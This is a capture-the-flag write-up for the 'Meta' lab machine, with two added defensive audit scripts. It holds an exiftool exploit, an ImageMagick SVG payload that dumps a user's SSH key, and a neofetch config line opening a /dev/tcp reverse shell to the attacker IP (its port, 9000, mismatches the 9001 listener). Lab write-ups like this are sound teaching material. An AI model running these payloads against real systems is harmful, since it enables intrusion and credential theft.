1. IP Address

# Machine Address
10.10.11.140

# Local Address
10.10.14.90

2. Nmap

nmap -sC -sV -oA nmap/meta 10.10.11.140

Result:

Starting Nmap 7.91 ( https://nmap.org ) at 2022-01-30 04:32 EST
Nmap scan report for 10.10.11.140
Host is up (0.24s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 46.09 seconds

Add artcorp.htb to /etc/hosts.

3. Gobuster

gobuster dir -u http://artcorp.htb -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt

Result:

Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://artcorp.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2022/01/30 04:38:58 Starting gobuster in directory enumeration mode
===============================================================
/assets               (Status: 301) [Size: 234] [--> http://artcorp.htb/assets/]
/css                  (Status: 301) [Size: 231] [--> http://artcorp.htb/css/] 

V-host:

gobuster vhost -u http://artcorp.htb -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://artcorp.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/01/30 04:45:39 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev01.artcorp.htb (Status: 200) [Size: 247]

Added dev01.artcorp.htb to /etc/hosts.

4. CVE-2021-22204

http://dev01.artcorp.htb/metaview/

Uploading an image gives:

File Type                       : JPEG
File Type Extension             : jpg
MIME Type                       : image/jpeg
JFIF Version                    : 1.01
Resolution Unit                 : None
X Resolution                    : 1
Y Resolution                    : 1
Image Width                     : 275
Image Height                    : 183
Encoding Process                : Baseline DCT, Huffman coding
Bits Per Sample                 : 8
Color Components                : 3
Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)

Exploiting the exiftool CVE to get a shell as www-data:

git clone https://github.com/convisolabs/CVE-2021-22204-exiftool

Edit the ip and port in the included exploit.py to your own address, run python3 exploit.py, and upload the newly generated image.jpg. Beforehand, start a listener with nc -lvnp 9001.

Shell stabilizing

python3 -c 'import pty;pty.spawn("/bin/bash")'

ctrl+z

stty raw -echo

fg, press enter twice, and once back in the nc session:

export TERM=xterm

/etc/passwd:

bash-5.0$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
thomas:x:1000:1000:thomas,,,:/home/thomas:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

We can see there is a user named thomas.

5. Exploitation

pspy64s:

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

Start a web server on the attacking machine:

mkdir www
mv pspy64s www
python3 -m http.server

On the target, as www-data:

cd /tmp
wget 10.10.14.90:8000/pspy64s
chmod +x pspy64s
./pspy64s

pspy shows a cron job running /usr/local/bin/convert_images.sh as UID 1000 (thomas):

2022/01/30 07:37:01 CMD: UID=1000 PID=26258  | /bin/bash /usr/local/bin/convert_images.sh 
2022/01/30 07:37:01 CMD: UID=1000 PID=26259  | /usr/local/bin/mogrify -format png *.* 
2022/01/30 07:37:01 CMD: UID=1000 PID=26260  | pkill mogrify 

/usr/local/bin/convert_images.sh:

#!/bin/bash
cd /var/www/dev01.artcorp.htb/convert_images/ && /usr/local/bin/mogrify -format png *.* 2>/dev/null
pkill mogrify

poc.svg: create it in /tmp with the following content and save it.

<image authenticate='ff" `echo $(cat ~/.ssh/id_rsa)> /dev/shm/key`;"'>  
 <read filename="pdf:/etc/passwd"/>  
 <get width="base-width" height="base-height" />  
 <resize geometry="400x400" />  
 <write filename="test.png" />  
 <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">  
 <image xlink:href="msl:poc.svg" height="100" width="100"/>  
 </svg>  
</image>

Copy it to the path below and wait for the cron job to run.

cp /tmp/poc.svg /var/www/dev01.artcorp.htb/convert_images/

A file named key containing thomas's id_rsa is now in /dev/shm. Transfer it with wget or cat, restore the proper key format (the echo $(cat ...) in the payload collapses the newlines), then:

mv key id_rsa
chmod 600 id_rsa
ssh -i id_rsa thomas@10.10.11.140
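The privilege escalation to thomas works because the cron job runs mogrify over whatever lands in a directory www-data can write to, and ImageMagick's MSL coder lets an SVG pull a shell command in through the authenticate attribute. The defensive fix is an ImageMagick policy.xml that gives the MSL coder (and the other ImageTragick-era coders, plus the PDF coder the poc also reads through) rights="none". The script below is an added example written for this writeup, not code from the box or from ImageMagick: it audits a policy.xml for those entries, and the two sample policies it writes are constructed for the demo run.

```shell
#!/bin/sh
# Added example: audit an ImageMagick policy.xml on a host that batch-converts
# untrusted files (as convert_images.sh does). The MSL coder is the one the
# poc.svg above relies on; the rest is the usual ImageTragick-era list, trimmed
# or extended to what the host really needs (constructed list).
RISKY_CODERS="MSL MVG EPHEMERAL URL HTTPS PDF PS PS2 PS3 XPS TEXT"

# coder_disabled FILE CODER -> exit 0 if FILE has a <policy domain="coder"> line
# giving rights="none" for exactly that coder pattern (case-insensitive).
# Brace patterns such as pattern="{PS,PDF}" are not recognised on purpose:
# the audit wants one explicit line per coder.
coder_disabled() {
    file=$1; coder=$2
    grep -iE "<policy[^>]*domain=\"coder\"[^>]*rights=\"none\"[^>]*pattern=\"${coder}\"" "$file" >/dev/null 2>&1 \
    || grep -iE "<policy[^>]*domain=\"coder\"[^>]*pattern=\"${coder}\"[^>]*rights=\"none\"" "$file" >/dev/null 2>&1
}

# missing_coder_policies FILE -> prints, space separated, the risky coders that
# FILE does not disable; returns 1 if any are missing, 0 if all are covered.
missing_coder_policies() {
    file=$1; missing=""
    for c in $RISKY_CODERS; do
        coder_disabled "$file" "$c" || missing="$missing $c"
    done
    missing=${missing# }
    printf '%s\n' "$missing"
    [ -z "$missing" ]
}

# write_sample_policy FILE KIND -> constructed sample policies for a demo run:
# "weak" only blocks the Ghostscript-backed coders and leaves MSL enabled,
# "hardened" adds a rights="none" line for every coder in RISKY_CODERS.
write_sample_policy() {
    file=$1; kind=$2
    {
        printf '<policymap>\n'
        printf '  <policy domain="resource" name="memory" value="256MiB"/>\n'
        if [ "$kind" = hardened ]; then
            for c in $RISKY_CODERS; do
                printf '  <policy domain="coder" rights="none" pattern="%s"/>\n' "$c"
            done
        else
            for c in PS PS2 PS3 EPS PDF XPS; do
                printf '  <policy domain="coder" rights="none" pattern="%s"/>\n' "$c"
            done
        fi
        printf '</policymap>\n'
    } > "$file"
}

# Stand-alone use: sh audit_policy.sh /etc/ImageMagick-6/policy.xml
if [ "$#" -ge 1 ]; then
    left=$(missing_coder_policies "$1" || true)
    if [ -z "$left" ]; then
        echo "ok: all risky coders disabled in $1"
    else
        echo "warning: coders still enabled in $1: $left"
    fi
fi
```

Note that the policy file only protects the ImageMagick build that reads it: a separately compiled binary under /usr/local/bin, like the mogrify on this box, looks for its own policy.xml under its own prefix, so the audit has to be pointed at that copy.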

user.txt:

1675c9*******

6. Enumeration

sudo -l

What thomas is allowed to run:

Matching Defaults entries for thomas on meta:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, env_keep+=XDG_CONFIG_HOME

User thomas may run the following commands on meta:
    (root) NOPASSWD: /usr/bin/neofetch \"\"

/usr/bin/neofetch:

       _,met$$$$$gg.          root@meta 
    ,g$$$$$$$$$$$$$$$P.       --------- 
  ,g$$P"     """Y$$.".        OS: Debian GNU/Linux 10 (buster) x86_64 
 ,$$P'              `$$$.     Host: VMware Virtual Platform None 
',$$P       ,ggs.     `$$b:   Kernel: 4.19.0-17-amd64 
`d$$'     ,$P"'   .    $$$    Uptime: 4 hours, 41 mins 
 $$P      d$'     ,    $$P    Packages: 495 (dpkg) 
 $$:      $$.   -    ,d$$'    Shell: bash 5.0.3 
 $$;      Y$b._   _,d$P'      CPU: AMD EPYC 7302P 16- (2) @ 2.994GHz 
 Y$$.    `.`"Y$$$$P"'         GPU: VMware SVGA II Adapter 
 `$$b      "-.__              Memory: 151MiB / 1994MiB 
  `Y$$
   `Y$$.                                              
     `$$b.
       `Y$$b.
          `"Y$b._
              `"""

/home/thomas/.config/neofetch:

vi config.conf
# add this line
bash &>/dev/tcp/10.10.14.90/9000 <&1
# listen on port 9001
nc -lvnp 9001
# on the target machine
export XDG_CONFIG_HOME=/home/thomas/.config
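The root step depends entirely on sudoers keeping XDG_CONFIG_HOME through env_reset: neofetch reads config.conf from $XDG_CONFIG_HOME/neofetch, so a variable the invoking user controls decides what root executes. The fix is to drop that env_keep entry (or point neofetch at a root-owned config with --config). The script below is an added example written for this writeup, not part of the box or of sudo: it parses a sudoers file for env_keep additions and flags the variables that steer what a privileged program loads; the sample sudoers files it writes are constructed.

```shell
#!/bin/sh
# Added example: flag sudoers rules where env_keep preserves a variable that the
# allowed command reads a config, library or search path from. The list below
# is constructed for this check; extend it for the programs sudoers allows.
RISKY_ENV_VARS="XDG_CONFIG_HOME XDG_DATA_HOME HOME PATH LD_PRELOAD LD_LIBRARY_PATH PYTHONPATH PERL5LIB BASH_ENV ENV"

# kept_env_vars FILE -> prints, one per line, every variable that FILE adds to
# env_keep via 'Defaults env_keep += "A B"' or 'Defaults env_keep+=A' lines.
kept_env_vars() {
    # drop comments, keep Defaults lines mentioning env_keep, strip everything
    # up to the '=' and the quotes, then split the list into one name per line
    sed -e 's/#.*//' "$1" \
    | grep -E '^[[:space:]]*Defaults.*env_keep' \
    | sed -E 's/.*env_keep[[:space:]]*\+?=[[:space:]]*//; s/"//g' \
    | tr ' ,' '\n\n' \
    | grep -v '^$' || true
}

# risky_env_keep FILE -> prints the kept variables that are on the risky list;
# returns 1 when at least one is found, 0 when the file is clean.
risky_env_keep() {
    found=""
    for v in $(kept_env_vars "$1"); do
        for r in $RISKY_ENV_VARS; do
            [ "$v" = "$r" ] && found="$found $v"
        done
    done
    found=${found# }
    printf '%s\n' "$found"
    [ -z "$found" ]
}

# write_sample_sudoers FILE KIND -> constructed sample files for a demo run.
# "weak" mirrors the sudo -l output above (XDG_CONFIG_HOME kept for a root
# neofetch run); "fixed" is the same rule without the env_keep line.
write_sample_sudoers() {
    file=$1; kind=$2
    {
        printf 'Defaults env_reset\n'
        printf 'Defaults mail_badpass\n'
        printf 'Defaults secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"\n'
        if [ "$kind" = weak ]; then
            printf 'Defaults env_keep += "XDG_CONFIG_HOME"\n'
        fi
        printf 'thomas ALL=(root) NOPASSWD: /usr/bin/neofetch \\"\\"\n'
    } > "$file"
}

# Stand-alone use: sh audit_sudoers.sh /etc/sudoers /etc/sudoers.d/*
if [ "$#" -ge 1 ]; then
    for f in "$@"; do
        hits=$(risky_env_keep "$f" || true)
        if [ -z "$hits" ]; then
            echo "ok: no risky env_keep in $f"
        else
            echo "warning: $f keeps $hits across env_reset"
        fi
    done
fi
```

The check is deliberately textual (no visudo parsing), so it also works on a copy of the file pulled off a host during an incident review; run it over /etc/sudoers.d/* as well, since drop-in files are where such entries usually hide.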

root.txt:

f44aa****